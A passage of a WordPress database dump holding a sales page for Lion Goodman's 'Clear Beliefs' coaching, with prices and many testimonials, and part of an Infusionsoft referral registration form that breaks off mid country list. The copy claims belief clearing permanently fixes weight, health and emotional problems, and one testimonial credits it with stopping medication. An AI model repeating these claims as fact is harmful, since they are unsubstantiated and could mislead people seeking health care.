(2486, 2, '2017-03-31 19:09:03', '2017-04-01 00:09:03', '[vc_row css=".vc_custom_1491335160850{margin-bottom: 0px !important;}"][vc_column][vc_column_text el_class="site-title-one"]<strong>Get Real Relief from Life’s Problems\r\n</strong>with Coaching by Lion[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="desc-one"]<strong><img class="alignleft wp-image-1433 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />Lion’s expertise is finding (and deleting) core beliefs and patterns deep in the subconscious mind –</strong> the source of the serious problems and issues in your life. He gently guides you through the process of clearing them, once and for all, so they never interfere with your life again.\r\n\r\n<strong>Many of us suffer from <em>Developmental Trauma</em></strong> – the bad programming we received when we were children.  Your parents, teachers, and caregivers were likely not models of unconditional love! So you took on beliefs, and conclusions, about yourself and the world. Negative and limiting beliefs at the core of your psyche can result in many different symptoms and conditions:[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491335119652{padding-right: 100px !important;padding-left: 100px !important;}"][vc_column width="1/2"][vc_column_text el_class="desc-one"]\r\n<ul>\r\n 	<li>Low-self-esteem and negative self-talk</li>\r\n 	<li>Comparing and judgment of self and others</li>\r\n 	<li>Critical or mean inner voices</li>\r\n 	<li>Lack of motivation</li>\r\n 	<li>Inability to bounce back from failure or challenge</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][vc_column width="1/2"][vc_column_text el_class="desc-one"]\r\n<ul>\r\n 	<li>Interference with success in business</li>\r\n 	<li>Difficulty with personal and work relationships</li>\r\n 	<li>Weight and health problems</li>\r\n 	<li>… and other uncomfortable feelings, body sensations, habits, and behaviors.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2513" img_size="full" alignment="center" onclick="custom_link" img_link_target="_blank" link="https://beliefcloset.infusionsoft.com/app/manageCart/addProduct?productId=80"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]THE PROCESS[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337395678{margin-top: 0px !important;}"][vc_column][vc_column_text el_class="desc-one"]In each session, Lion will ask you to identify the problem or condition that has been holding you back or interfering with your life.  You will discover the source of the pattern – beliefs and patterns from your childhood that continue to operating in your subconscious mind.\r\n\r\nLion then guides you through the <em><strong>Clear Beliefs Process</strong></em>, and shows you how to permanently delete the source material from your psyche.\r\n\r\n<strong>Once you delete the old pattern, you can then choose what you would prefer, and install that new belief into the same core, at the "causal" level of the mind.  </strong>This give you the opportunity to program your own mind with the best of your wisdom and virtues, based on your own free will choice.  <strong>You decide what you want to believe, in every case.  You become the creator of your own life.</strong>[/vc_column_text][/vc_column][/vc_row][vc_row parallax="content-moving" parallax_image="2512" css=".vc_custom_1491337388303{margin-top: 20px !important;}"][vc_column][vc_empty_space height="300px"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]SPECIAL LIMITED TIME OFFER[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337395678{margin-top: 0px !important;}"][vc_column][vc_column_text el_class="desc-one"]<strong>Lion''s coaching rate is $300 per hour, with a package of 10 coaching hours available at a discounted rate of $275 per hour.</strong>    The package price is $2,750.  You may use these hours for seven one-hour sessions, or for longer sessions. (After the first hour, time is billed in 15-minute increments).[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2513" img_size="full" alignment="center" onclick="custom_link" img_link_target="_blank" link="https://beliefcloset.infusionsoft.com/app/manageCart/addProduct?productId=80"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]WHAT PEOPLE ARE SAYING ABOUT LION GOODMAN, P.C.C.[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337580910{margin-top: 20px !important;}"][vc_column width="1/6"][/vc_column][vc_column width="2/3" el_class="blovk1"][vc_column_text el_class="testi-1"]<em>When I realized I needed support, you took my hand and guided me into the scariest, darkest, and hot-as-hell locations of my inner psyche. As the healing began, I released one obstacle at a time, and received the nourishment needed to heal. Thank you for opening my heart and soul.  </em>\r\n~ Nance B., Spokane, Washington[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336569871{margin-top: 30px !important;}"]<em>Lion taught me and encouraged me to embrace and understand pain and discomfort through mindfulness, meditation, and his Clear Beliefs process. That has allowed me to remove pills from my life</em>.\r\n\r\n~ P. Zeller, Denver, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336617630{margin-top: 30px !important;}"]<em>I continue to use the Clear Beliefs process on myself, and with my clients. It continues to grow organically (just as you predicted) from my clients’ individual needs.</em>\r\n\r\n~ Melinda Matzell, Therapeutic Yoga Instructor and Therapist[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336633092{margin-top: 30px !important;}"]<em>I’m very excited by how I’ve been using the Clear Beliefs Process. I love integrating your powerful tools in a larger context and flow of practices. I think it’s a huge part of the success my students are experiencing.</em>\r\n\r\n~ Tomar Levine, Soul Guidance for Business, New York[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336646140{margin-top: 30px !important;}"]<em>In our very powerful coaching session, I felt a shift both emotionally and physically. What had been stuck inside me my whole life finally came out. I’m still processing what happened, but for maybe the first time in my life, I feel shame-free. I no longer feel the need to justify myself for who I am.” </em>  ~ MRG, Pasadena, California[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336660589{margin-top: 30px !important;}"]<em>Thanks again for a powerful session. That night, my wife and I were planning a trip to Costa Rica. With a more grounded energy inside of me, I had new eyes, and new possibilities opened up. We magically found a way to reduce the cost of the trip by several thousand dollars! It felt like a direct result of the session, with practical intelligence starting to operate more fully inside of me. The session has already paid for itself many times!</em>\r\n\r\n~ David Nicol, Ph.D., Sebastopol, California[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336672294{margin-top: 30px !important;}"]<em>I have been living in a completely new space since our work together. The shame has virtually disappeared. I have a new life. I feel free. It’s like the contents in my psyche’s warehouse have been removed and I can now explore this openness. I can think more clearly. I am more alert, more energetic. I no longer feel like I’m dragging a burden around all the time. I am sooo much lighter. I am growing up! It’s rather miraculous. My children have noticed the changes and they are changing too. The tension has been radically reduced. It is a new beginning – a new life!</em>\r\n\r\n~ Sherri Pula, Ontario Canada[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336684398{margin-top: 30px !important;}"]<em>I used your technique for getting rid of underlying belief around money. I’m on commission and hadn’t had a sale in 3 months. 18 hours after clearing my beliefs, I got a call from a prospect I had given up on. He said he’s ready to buy!</em>\r\n\r\n~ Gene Tress, Ann Arbor, Michigan[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336696821{margin-top: 30px !important;}"]<em>The Clear Beliefs Process is simply the best way I’ve found to permanently remove old troublesome beliefs. The process works even on core beliefs, established in early childhood – the ones that have produced intense suffering for decades. Over the past four months I’ve witnessed amazing changes in myself, and in those I’m working with.</em>\r\n\r\n~ Jim Bird, Life Coach, Downingtown, Pennsylvania[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336709999{margin-top: 30px !important;}"]<em>The Clear Beliefs course has been a joy and privilege to attend. I’ve cleared what has kept me stuck from moving forward in my life. The tools have enabled me to take action and get me off my ass and create! It has been a joy and a blessing. As a Licensed Psychological Counselor in private practice, what I’ve learned has brought a new sense of joy and excitement into my work. My clients tell me they love the processes and are excited in the results they are getting – especially the children. I love seeing them reconnect to their joy, happiness and childlike wonder.</em>\r\n\r\n~ Deborah Chelette-Wilson, Winnsboro, Texas[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336721668{margin-top: 30px !important;}"]<em>I have used the Clear Beliefs process many times, and find it extremely useful.  It makes belief change much easier than with other processes I have used in the past. It is very powerful. I’ve had some amazing results with it. My old belief outfits are sometimes quite ghastly and unpleasant. My new beliefs feel wonderful, and they are beautiful, shiny, expansive and open.  Thank you very much for developing and sharing such a powerful process.</em>\r\n\r\n~ Jaki Kennedy, Kingston Upon Thames, England[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336733101{margin-top: 30px !important;}"]<em>You were the turning point for me. You helped me awaken, and you saw me and believed in me when I was showing up as a shy, confused and sad young woman. I honestly don’t know where I’d be without you. I so appreciate your love, knowledge and mentorship.</em>\r\n\r\n~ Sally Hope, Wildheart Revolution, Bozeman, Montana[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336746644{margin-top: 30px !important;}"]<em>The last 40 years of my life were tough – a lot of difficulties and very little joy. I came to the same painful places too often, which left me feeling immense grief, or uncomfortable numbness at best. During our work together, my zest for life began to come back. I am beginning to experience joy and excitement, and to create my life, rather than letting it pass me by. I look forward to the new bright day that is dawning. I am very grateful to you.</em>\r\n\r\n~ Monika Jacobson, Stuttgart, Germany[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336769741{margin-top: 30px !important;}"]<em>Lion is one of the most intelligent, caring, creative, and experienced mental health professionals I have ever met. My gratitude cannot be expressed with words.</em>\r\n\r\n~ Jeanette Spence, APRN, Columbia, South Carolina[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336780046{margin-top: 30px !important;}"]<em>The Clear Beliefs Process transformed several underlying beliefs which had previously limited me. I gained not only new, more powerful beliefs, but I also learned a process I can use in the future to fine-tune my beliefs anytime in the future.</em>\r\n\r\n~ Kathryn P., Summit County, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336790325{margin-top: 30px !important;}"]<em>The impact of our work together is still unfolding. My inner child was healed by your loving reflections and the message of protection you delivered. This opened me to move beyond the hurts and harm of the past, and brought new-found awareness.  I feel freed from dragging around garbage bags of weighty stuff, and the radiance of true Beingness that showed up at the end is still with me! I see and feel things coming to me that will propel my growth and movement as a change agent and Light Server. There is no time to lose, it appears. Get on with it, do it now!</em> ~ D.F., Portland, Oregon[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336800668{margin-top: 30px !important;}"]<em>The Clear Beliefs training with Lion is the single best investment I’ve made in my well-being for a very long time. I experienced deep core insights right from the beginning, and in each and every session. As I released old, limiting conditioning and confirmed new, revitalizing beliefs, my optimism, clarity, productivity and finances increased too! If you are ready to address the challenges you are facing and take a stand for having what you want, I cannot recommend his programs more highly.</em>\r\n\r\n~ Sandy Kuehl, Des Moines, Iowa[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336812291{margin-top: 30px !important;}"]<em>I use the Clear Beliefs process for myself every week, and I use it with my clients regularly. My whole life is shifting. I used to be miserable because of my inner critic. I am much more generous and forgiving of myself. I now live without the constant judgment and feeling bad about everything. I am cheerful more often, including at home.  I am taking steps that I just couldn’t before and now it seems natural. My heart swells instead of hides and shrivels. That is the best outcome for me because it allows me to move forward. This work is real. It creates positive change. It’s beautiful.</em>  ~ R.T., Denver, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336821891{margin-top: 30px !important;}"]<em>There’s something about this process that has made it much easier to let underlying beliefs float to the surface where I can see them for what they are. They seem like separate entities that I can address respectfully, rather than shameful things to avoid.</em>\r\n\r\n~ B.L., Paducah, Kentucky[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336832515{margin-top: 30px !important;}"]<em>This belief course was exactly what I had been searching for but couldn’t find. It’s been liberating and enlightening to be able to finally uncover and discover the blocks and beliefs that have been problematic, worrisome, stressful and hindering in many aspects and areas of my life. I appreciate that this is something I can continue to practice on my own, and get excellent results! Thank you!</em>\r\n\r\n~ Janna Ekstrom, Bend, Oregon[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336848334{margin-top: 30px !important;}"]<em>In the course we got to witness many people releasing negative beliefs about themselves. You could actually hear their voice change – they sounded lighter, often laughing and giggling like kids! It’s been amazing and inspirational to watch Lion work. In one session he helped the person create a new belief: “I am joyful and my inner child is safe.” It is miraculous to watch the changes from so simple an act.\r\n</em>~ Thea Deley, Paonia, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336857556{margin-top: 30px !important;}"]<em>You have really given me confidence that troublesome beliefs can, in fact, be changed.</em>\r\n~ Julian Graham, London, England[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336869972{margin-top: 30px !important;}"]<em>As a Stress Therapist, I can recommend the Clear Beliefs Process as a first place winner to relieve stress and create a balanced life! I’ve studied cognitive work and believe that this work is much more value for the money – it actually transforms your subconscious mind – which is a rare thing!\r\n</em>~ Marina Malmberg, Stress Therapist, Sweden[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336878620{margin-top: 30px !important;}"]<em>The Clear Beliefs process is amazing in terms of the results produced in just a few weeks. My core beliefs, which had been troublesome for decades, simply lost their emotional charge — and were replaced by new beliefs that support and thrill me!</em>\r\n~ Jim Bird, Downingtown, PA[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336886556{margin-top: 30px !important;}"]<em>Lion’s voice and manner are reassuring and unflappable.  I was amazed by his ability to support and encourage every client. If one approach did not reach the problem, he shifted to yet another way to look at things. You could hear the change in the participant’s voice when the core belief was reached. Amazing!</em>\r\n~ M.P., Auckland, New Zealand[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336894292{margin-top: 30px !important;}"]<em>The techniques are both fun and powerful. This work will continue to influence how I think and perceive what’s going on in my head – and in my life!</em>\r\n~ L.Z., Paris, France[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336902995{margin-top: 30px !important;}"]<em>My experience has been deep, bittersweet, and liberating. After dis-creating many core beliefs from my early childhood, those belief clusters were gone. Others surfaced, which Lion said was normal, and a part of the process. I will use the Clear Beliefs Process to deal with them, one by one, and I’m confident that I have the tools in hand.\r\n</em>~ P.P., Boca Raton, Florida[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336911587{margin-top: 30px !important;}"]<em>In terms of change in and for myself, and in terms of time spent, this was about the best investment I’ve ever made in a course (and I have taken many).</em>\r\n~ D.K., Bozeman, Montana[/vc_column_text][/vc_column][vc_column width="1/6"][/vc_column][/vc_row][vc_row css=".vc_custom_1491337857353{margin-top: 30px !important;}"][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2513" img_size="full" alignment="center" onclick="custom_link" img_link_target="_blank" link="https://beliefcloset.infusionsoft.com/app/manageCart/addProduct?productId=80"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row]', 'Coaching with Lion Goodman', '', 'publish', 'closed', 'closed', '', 'coachingwithlion', '', '', '2018-02-09 19:54:31', '2018-02-10 00:54:31', '', 0, 'http://clearyourbeliefs.com/?page_id=2486', 0, 'page', '', 0),
(2476, 2, '2018-02-05 20:44:45', '2018-02-06 01:44:45', '<h1 style="text-align: center;"><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01">// <![CDATA[ // ]]></script></h1>\n<div class="icon_box style="><form id="inf_form_3f71c00a94d36f3139b9a849b793215b" class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST">\n<div id="mainContent" class="simple beta-base beta-font-b" style="height: 100%;"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.68.0.179" />\n<div>\n<div class="authoring-image image-snippet">\n<div class="authoring-image image-snippet">\n<div class="imageSnippet-alignDiv"><img class="simage" title="Interesting Image" src="https://d1yoaun8syyxxt.cloudfront.net/beliefcloset-d0c3a1d5-c389-4ad8-a263-5ef7f9a5dff9-v2" alt="Interesting Image" width="585" height="142" align="bottom" border="0" /></div>\n</div>\n</div>\n</div>\n<div>\n<div class="text">\n<div id="paragraph" class="text paragraph">\n<div>\n<div>\n<strong>\nReferral Partner Registration\n</strong></div>\n</div>\n</div>\n</div>\n</div>\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" placeholder="First Name *" /></div>\n<div class="infusion-field"><label for="inf_field_LastName">Last Name *</label>\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" placeholder="Last Name *" /></div>\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" placeholder="Email *" /></div>\n<div>\n<div></div>\n</div>\n<div></div>\n<div>\n<div></div>\n</div>\n<div class="infusion-field"><label for="inf_field_Company">Company</label>\n<input id="inf_field_Company" class="infusion-field-input-container" name="inf_field_Company" type="text" placeholder="Company" /></div>\n<div class="infusion-field"><label for="inf_field_Phone1">Phone Number *</label>\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" placeholder="Phone Number *" /></div>\n<div class="infusion-field"><label for="inf_field_StreetAddress1">Street Address 1 *</label>\n<input id="inf_field_StreetAddress1" class="infusion-field-input-container" name="inf_field_StreetAddress1" type="text" placeholder="Street Address 1 *" /></div>\n<div class="infusion-field"><label for="inf_field_StreetAddress2"> Street Address 2</label>\n<input id="inf_field_StreetAddress2" class="infusion-field-input-container" name="inf_field_StreetAddress2" type="text" placeholder=" Street Address 2" /></div>\n<div class="infusion-field"><label for="inf_field_City"> City *</label>\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" placeholder=" City *" /></div>\n<div class="infusion-field"><label for="inf_field_State">State *</label>\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" placeholder="State *" /></div>\n<div class="infusion-field"><label for="inf_field_PostalCode"> Postal Code *</label>\n<input id="inf_field_PostalCode" class="infusion-field-input-container" name="inf_field_PostalCode" type="text" placeholder=" Postal Code *" /></div>\n<div class="infusion-field"><label for="inf_field_Country">Country *</label>\n<div class="infusion-field-input-container"><select id="inf_field_Country" name="inf_field_Country">\n<option value="">Please select one</option>\n<option value="Afghanistan">Afghanistan</option>\n<option value="Åland Islands">Åland Islands</option>\n<option value="Albania">Albania</option>\n<option value="Algeria">Algeria</option>\n<option value="American Samoa">American Samoa</option>\n<option value="Andorra">Andorra</option>\n<option value="Angola">Angola</option>\n<option value="Anguilla">Anguilla</option>\n<option value="Antarctica">Antarctica</option>\n<option value="Antigua and Barbuda">Antigua and Barbuda</option>\n<option value="Argentina">Argentina</option>\n<option value="Armenia">Armenia</option>\n<option value="Aruba">Aruba</option>\n<option value="Australia">Australia</option>\n<option value="Austria">Austria</option>\n<option value="Azerbaijan">Azerbaijan</option>\n<option value="Bahamas (the)">Bahamas (the)</option>\n<option value="Bahrain">Bahrain</option>\n<option value="Bangladesh">Bangladesh</option>\n<option value="Barbados">Barbados</option>\n<option value="Belarus">Belarus</option>\n<option value="Belgium">Belgium</option>\n<option value="Belize">Belize</option>\n<option value="Benin">Benin</option>\n<option value="Bermuda">Bermuda</option>\n<option value="Bhutan">Bhutan</option>\n<option value="Bolivia (Plurinational State of)">Bolivia (Plurinational State of)</option>\n<option value="Bonaire, Sint Eustatius and Saba">Bonaire, Sint Eustatius and Saba</option>\n<option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option>\n<option value="Botswana">Botswana</option>\n<option value="Bouvet Island">Bouvet Island</option>\n<option value="Brazil">Brazil</option>\n<option value="British Indian Ocean Territory (the)">British Indian Ocean Territory (the)</option>\n<option value="Brunei Darussalam">Brunei Darussalam</option>\n<option value="Bulgaria">Bulgaria</option>\n<option value="Burkina Faso">Burkina Faso</option>\n<option value="Burundi">Burundi</option>\n<option value="Cabo Verde">Cabo Verde</option>\n<option value="Cambodia">Cambodia</option>\n<option value="Cameroon">Cameroon</option>\n<option value="Canada">Canada</option>\n<option value="Cayman Islands (the)">Cayman Islands (the)</option>\n<option value="Central African Republic (the)">Central African Republic (the)</option>\n<option value="Chad">Chad</option>\n<option value="Chile">Chile</option>\n<option value="China">China</option>\n<option value="Christmas Island">Christmas Island</option>\n<option value="Cocos (Keeling) Islands (the)">Cocos (Keeling) Islands (the)</option>\n<option value="Colombia">Colombia</option>\n<option value="Comoros (the)">Comoros (the)</option>\n<option value="Congo (the Democratic Republic of the)">Congo (the Democratic Republic of the)</option>\n<option value="Congo (the)">Congo (the)</option>\n<option value="Cook Islands (the)">Cook Islands (the)</option>\n<option value="Costa Rica">Costa Rica</option>\n<option value="Côte d''Ivoire">Côte d''Ivoire</option>\n<option value="Croatia">Croatia</option>\n<option value="Cuba">Cuba</option>\n<option value="Curaçao">Curaçao</option>\n<option value="Cyprus">Cyprus</option>\n<option value="Czech Republic (the)">Czech Republic (the)</option>\n<option value="Denmark">Denmark</option>\n<option value="Djibouti">Djibouti</option>\n<option value="Dominica">Dominica</option>\n<option value="Dominican Republic (the)">Dominican Republic (the)</option>\n<option value="Ecuador">Ecuador</option>\n<option value="Egypt">Egypt</option>\n<option value="El Salvador">El Salvador</option>\n<option value="Equatorial Guinea">Equatorial Guinea</option>\n<option value="Eritrea">Eritrea</option>\n<option value="Estonia">Estonia</option>\n<option value="Ethiopia">Ethiopia</option>\n<option value="Falkland Islands (the) [Malvinas]">Falkland Islands (the) [Malvinas]</option>\n<option value="Faroe Islands (the)">Faroe Islands (the)</option>\n<option value="Fiji">Fiji</option>\n<option value="Finland">Finland</option>\n<option value="France">France</option>\n<option value="French Guiana">French Guiana</option>\n<option value="French Polynesia">French Polynesia</option>\n<option value="French Southern Territories (the)">French Southern Territories (the)</option>\n<option value="Gabon">Gabon</option>\n<option value="Gambia (the)">Gambia (the)</option>\n<option value="Georgia">Georgia</option>\n<option value="Germany">Germany</option>\n<option value="Ghana">Ghana</option>\n<option value="Gibraltar">Gibraltar</option>\n<option value="Greece">Greece</option>\n<option value="Greenland">Greenland</option>\n<option value="Grenada">Grenada</option>\n<option value="Guadeloupe">Guadeloupe</option>\n<option value="Guam">Guam</option>\n<option value="Guatemala">Guatemala</option>\n<option value="Guernsey">Guernsey</option>\n<option value="Guinea">Guinea</option>\n<option value="Guinea-Bissau">Guinea-Bissau</option>\n<option value="Guyana">Guyana</option>\n<option value="Haiti">Haiti</option>\n<option value="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>\n<option value="Holy See (the)">Holy See (the)</option>\n<option value="Honduras">Honduras</option>\n<option value="Hong Kong">Hong Kong</option>\n<option value="Hungary">Hungary</option>\n<option value="Iceland">Iceland</option>\n<option value="India">India</option>\n<option value="Indonesia">Indonesia</option>\n<option value="Iran (Islamic Republic of)">Iran (Islamic Republic of)</option>\n<option value="Iraq">Iraq</option>\n<option value="Ireland">Ireland</option>\n<option value="Isle of Man">Isle of Man</option>\n<option value="Israel">Israel</option>\n<option value="Italy">Italy</option>\n<option value="Jamaica">Jamaica</option>\n<option value="Japan">Japan</option>\n<option value="Jersey">Jersey</option>\n<option value="Johnston Island">Johnston Island</option>\n<option value="Jordan">Jordan</option>\n<option value="Kazakhstan">Kazakhstan</option>\n<option value="Kenya">Kenya</option>\n<option value="Kiribati">Kiribati</option>\n<option value="Korea (the Democratic People''s Republic of)">Korea (the Democratic People''s Republic of)</option>\n<option value="Korea (the Republic of)">Korea (the Republic of)</option>\n<option value="Kuwait">Kuwait</option>\n<option value="Kyrgyzstan">Kyrgyzstan</option>\n<option value="Lao People''s Democratic Republic (the)">Lao People''s Democratic Republic (the)</option>\n<option value="Latvia">Latvia</option>\n<option value="Lebanon">Lebanon</option>\n<option value="Lesotho">Lesotho</option>\n<option value="Liberia">Liberia</option>\n<option value="Libya">Libya</option>\n<option value="Liechtenstein">Liechtenstein</option>\n<option value="Lithuania">Lithuania</option>\n<option value="Luxembourg">Luxembourg</option>\n<option value="Macao">Macao</option>\n<option value="Macedonia (the former Yugoslav Republic of)">Macedonia (the former Yugoslav Republic of)</option>\n<option value="Madagascar">Madagascar</option>\n<option value="Malawi">Malawi</option>\n<option value="Malaysia">Malaysia</option>\n<option value="Maldives">Maldives</option>\n<option value="Mali">Mali</option>\n<option value="Malta">Malta</option>\n<option value="Marshall Islands (the)">Marshall Islands (the)</option>\n<option value="Martinique">Martinique</option>\n<option value="Mauritania">Mauritania</option>\n<option value="Mauritius">Mauritius</option>\n<option value="Mayotte">Mayotte</option>\n<option value="Mexico">Mexico</option>\n<option value="Micronesia (Federated States of)">Micronesia (Federated States of)</option>\n<option value="Midway Islands">Midway Islands</option>\n<option value="Moldova (the Republic of)">Moldova (the Republic of)</option>\n<option value="Monaco">Monaco</option>\n<option value="Mongolia">Mongolia</option>\n<option value="Montenegro">Montenegro</option>\n<option value="Montserrat">Montserrat</option>\n<option value="Morocco">Morocco</option>\n<option value="Mozambique">Mozambique</option>\n<option value="Myanmar">Myanmar</option>\n<option value="Namibia">Namibia</option>\n<option value="Nauru">Nauru</option>\n<option value="Nepal">Nepal</option>\n<option value="Netherlands (the)">Netherlands (the)</option>\n<option value="New Caledonia">New Caledonia</option>\n<option value="New Zealand">New Zealand</option>\n<option value="Nicaragua">Nicaragua</option>\n<option value="Niger (the)">Niger (the)</option>\n<option value="Nigeria">Nigeria</option>\n<option value="Niue">Niue</option>\n<option value="Norfolk Island">Norfolk Island</option>\n<option value="Northern Mariana Islands (the)">Northern Mariana Islands (the)</option>\n<option value="Norway">Norway</option>\n<option value="Oman">Oman</option>\n<option value="Pakistan">Pakistan</option>\n<option value="Palau">Palau</option>\n<option value="Palestine, State of">Palestine, State of</option>\n<option value="Panama">Panama</option>\n<option value="Papua New Guinea">Papua New Guinea</option>\n<option value="Paraguay">Paraguay</option>\n<option value="Peru">Peru</option>\n<option value="Philippines (the)">Philippines (the)</option>\n<option value="Pitcairn">Pitcairn</option>\n<option value="Poland">Poland</option>\n<option value="Portugal">Portugal</option>\n<option value="Puerto Rico">Puerto Rico</option>\n<option value="Qatar">Qatar</option>\n<option value="Réunion">Réunion</option>\n<option value="Romania">Romania</option>\n<option value="Russian Federation (the)">Russian Federation (the)</option>\n<option value="Rwanda">Rwanda</option>\n<option value="Saint Barthélemy">Saint Barthélemy</option>\n<option value="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>\n<option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option>\n<option value="Saint Lucia">Saint Lucia</option>\n<option value="Saint Martin (French part)">Saint Martin (French part)</option>\n<option value="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>\n<option value="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>\n<option value="Samoa">Samoa</option>\n<option value="San Marino">San Marino</option>\n<option value="Sao Tome and Principe">Sao Tome and Principe</option>\n<option value="Saudi Arabia">Saudi Arabia</option>\n<option value="Senegal">Senegal</option>\n<option value="Serbia">Serbia</option>\n<option value="Seychelles">Seychelles</option>\n<option value="Sierra Leone">Sierra Leone</option>\n<option value="Singapore">Singapore</option>\n<option value="Sint Maarten (Dutch part)">Sint Maarten (Dutch part)</option>\n<option value="Slovakia">Slovakia</option>\n<option value="Slovenia">Slovenia</option>\n<option value="Solomon Islands">Solomon Islands</option>\n<option value="Somalia">Somalia</option>\n<option value="South Africa">South Africa</option>\n<option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>\n<option value="South Sudan">South Sudan</option>\n<option value="Southern Rhodesia">Southern Rhodesia</option>\n<option value="Spain">Spain</option>\n<option value="Sri Lanka">Sri Lanka</option>\n<option value="Sudan (the)">Sudan (the)</option>\n<option value="Suriname">Suriname</option>\n<option value="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>\n<option value="Swaziland">Swaziland</option>\n<option value="Sweden">Sweden</option>\n<option value="Switzerland">Switzerland</option>\n<option value="Syrian Arab Republic">Syrian Arab Republic</option>\n<option value="Taiwan (Province of China)">Taiwan (Province of China)</option>\n<option value="Tajikistan">Tajikistan</option>\n<option value="Tanzania, United Republic of">Tanzania, United Republic of</option>\n<option value="Thailand">Thailand</option>\n<option value="Timor-Leste">Timor-Leste</option>\n<option value="Togo">Togo</option>\n<option value="Tokelau">Tokelau</option>\n<option value="Tonga">Tonga</option>\n<option value="Trinidad and Tobago">Trinidad and Tobago</option>\n<option value="Tunisia">Tunisia</option>\n<option value="Turkey">Turkey</option>\n<option value="Turkmenistan">Turkmenistan</option>\n<option value="Turks and Caicos Islands (the)">Turks and Caicos Islands (the)</option>\n<option value="Tuvalu">Tuvalu</option>\n<option value="Uganda">Uganda</option>\n<option value="Ukraine">Ukraine</option>\n<option value="United Arab Emirates (the)">United Arab Emirates (the)</option>\n<option value="United Kingdom">United Kingdom</option>\n<option value="United States">United States</option>\n<option value="United States Minor Outlying Islands (the)">United States Minor Outlying Islands (the)</option>\n<option value="Upper Volta">Upper Volta</option>\n<option value="Uruguay">Uruguay</option>\n<option value="Uzbekistan">Uzbekistan</option>\n<option value="Vanuatu">Vanuatu</option>\n<option value="Venezuela (Bolivarian Republic of)">Venezuela (Bolivarian Republic of)</option>\n<option value="Viet Nam">Viet Nam</option>\n<option value="Virgin Islands (British)">Virgin Islands (British)</option>\n<option value="Virgin Islands (U.S.)">Virgin Islands (U.S.)</option>\n<option value="Wallis and Futuna">Wallis and Futuna</option>\n<option value="Western Sahara">Western Sahara</option>\n<option value="Yemen">Yemen</option>\n<option value="Zambia">Zambia</option>\n<option 